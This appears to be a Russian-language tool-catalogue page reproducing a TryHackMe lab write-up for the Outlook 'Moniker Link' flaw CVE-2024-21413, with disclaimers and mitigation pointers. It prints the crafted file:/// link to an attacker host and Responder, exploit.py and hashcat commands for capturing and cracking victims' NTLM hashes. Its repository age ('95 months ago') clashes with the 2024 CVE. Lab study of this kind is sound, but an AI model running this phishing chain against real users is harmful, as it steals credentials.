Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Estudo-de-Caso-CVE-2024-21413 — Пример исследования CVE-2024-21413. Используется как параметр в комнате TryHackMe Moniker Link (CVE-2024-21413). Внесены правки с помощью claude code в эксплойт. | Kitploit
Инструменты/GitHubGitHub/pedro-lucas-melo/estudo-de-caso-cve-2024-21413
Взлом паролейАнализ уязвимостейЭксплуатацияЛатеральное перемещениеФишингCTFОбучение и ОбразованиеБезопасность Электронной ПочтыЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubpedro-lucas-melo/estudo-de-caso-cve-2024-21413

Estudo-de-Caso-CVE-2024-21413

Пример исследования CVE-2024-21413. Используется как параметр в комнате TryHackMe Moniker Link (CVE-2024-21413). Внесены правки с помощью claude code в эксплойт.

Репозиторий
95 месяцев назадЕщё не проверено

CVE-2024-21413 — Moniker Link 🔗💀

Microsoft Outlook RCE + Утечка NTLM-учётных данных

⚠️ Правовое предупреждение: Этот репозиторий предназначен исключительно для образовательных целей и исследований в области безопасности. Все демонстрации проводились в контролируемых и изолированных средах. Использование этих методов против систем без явного разрешения незаконно и неэтично.


📋 Содержание

  • Обзор
  • Как работает уязвимость
  • Лабораторная среда
  • Пошаговая демонстрация
  • Скрипт эксплойта
  • Диаграмма атаки
  • Смягчение и защита
  • Разбор CVE
  • Ссылки

🔍 Обзор

CVE-2024-21413 — это критическая уязвимость в Microsoft Outlook, позволяющая атакующему:

  1. Утечка NTLM-учётных данных жертвы путем принудительной автоматической SMB-аутентификации
  2. Удаленное выполнение кода на целевой машине через вредоносную ссылку в электронном письме

Название «Moniker Link» происходит от эксплуатации Monikers модели COM (Component Object Model) — механизма Windows для ссылки на объекты по строке — для обхода защитных механизмов Outlook против ссылок file://.


🧠 Как работает уязвимость

Проблема: Обход защищённого просмотра

Обычно Outlook блокирует ссылки file://, указывающие на сетевые ресурсы, отображая предупреждение безопасности (Protected View). Ошибка заключается в том, как Outlook обрабатывает URL-адреса, содержащие символ ! — разделитель Moniker.

Эксплуатация

Вредоносная ссылка формата:

root@kitploit:~
file:///\\IP_АТАКУЮЩЕГО\share\!что-то

Символ ! заставляет парсер Outlook интерпретировать URL как ссылку на COM Moniker, игнорируя обычные проверки безопасности. Результат:

  • Машина жертвы автоматически пытается аутентифицироваться через SMB на сервере атакующего
  • Во время этой аутентификации передается NTLM-хэш жертвы
  • Этот хэш может быть использован в атаках Pass-the-Hash или взломан офлайн

Упрощенный поток

root@kitploit:~
Атакующий отправляет email → Жертва кликает по ссылке → Outlook обрабатывает URL с "!"
→ Обход Protected View → Автоматическое SMB-подключение → NTLM-хэш захвачен

🖥️ Лабораторная среда

Для безопасного воспроизведения этого исследования:

МашинаОперационная системаРоль
АтакующийKali LinuxSMB-слушатель + Эксплойт
ЦельWindows 10/11 с уязвимым OutlookЖертва

Важно: Используйте изолированную сеть (NAT или Host-Only в VirtualBox/VMware). Никогда не запускайте в реальных сетях.

Необходимые инструменты

root@kitploit:~
# Responder — SMB/HTTP-слушатель для захвата хэшей
sudo apt install responder

# Python 3 — для запуска эксплойта
python3 --version

# Проверка связности между машинами
ping <IP_ЦЕЛИ>

🚀 Пошаговая демонстрация

Шаг 1 — Определить IP-адрес машины атакующего

root@kitploit:~
ip a | grep inet
# Запишите IP интерфейса, который связывается с целью (например, 192.168.56.10)

Шаг 2 — Запустить Responder

Responder создает поддельный SMB-сервер, захватывающий NTLM-хэши аутентификации.

root@kitploit:~
sudo responder -I eth0 -v
# Замените eth0 на ваш сетевой интерфейс

Ожидаемый вывод:

root@kitploit:~
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ЦЕЛЬ\пользователь
[SMB] NTLMv2-SSP Hash     : пользователь::DESKTOP-ЦЕЛЬ:...

Шаг 3 — Запустить эксплойт

root@kitploit:~
python3 exploit.py \
  --sender [email protected] \
  --recipient [email protected] \
  --server <IP_ПОЧТОВОГО_СЕРВЕРА> \
  --attacker-ip 192.168.56.10

Шаг 4 — Дождаться, пока жертва кликнет по ссылке

Когда жертва открывает письмо и кликает по ссылке, Responder автоматически захватывает NTLM-хэш. Этот хэш может быть:

  • Проанализирован для идентификации скомпрометированной учетной записи
  • Использован в Pass-the-Hash для боковой аутентификации в сети
  • Отправлен в Hashcat/John для попытки офлайн-взлома:
root@kitploit:~
hashcat -m 5600 hash.txt wordlist.txt

🐍 Скрипт эксплойта

Смотрите файл exploit.py для полного и прокомментированного скрипта.


📊 Диаграмма атаки

Смотрите файл diagrama-ataque.html для интерактивной визуализации полного потока атаки.


🛡️ Смягчение и защита

Смотрите файл MITIGACAO.md для полного руководства по смягчению и защите.


📄 Разбор CVE

Смотрите файл CVE-BREAKDOWN.md для детального технического анализа уязвимости.


📚 Ссылки

  • Рекомендации Microsoft по безопасности — CVE-2024-21413
  • Morphisec — Исследование Moniker Link
  • TryHackMe — Комната Moniker Link
  • Инструмент Responder — GitHub
  • Аутентификация NTLM — Документация Microsoft
  • NVD — CVE-2024-21413

👤 Автор

Исследование выполнено в рамках практического обучения атакующей безопасности через TryHackMe.

Этот проект следует принципам responsible disclosure и этичного хакинга. Весь представленный здесь контент направлен на обучение и улучшение уровня безопасности.

Скачать инструмент
ПолеДетали
CVECVE-2024-21413
Раскрытие13 февраля 2024 (Patch Tuesday)
Оценка CVSS9.8 (Критический)
ПродуктMicrosoft Outlook
ТипУдаленное выполнение кода + Утечка учётных данных (NTLM Hash)
ВекторСеть / Электронная почта (без предварительной аутентификации)
ВзаимодействиеТребуется взаимодействие пользователя (клик по ссылке)
ПсевдонимMoniker Link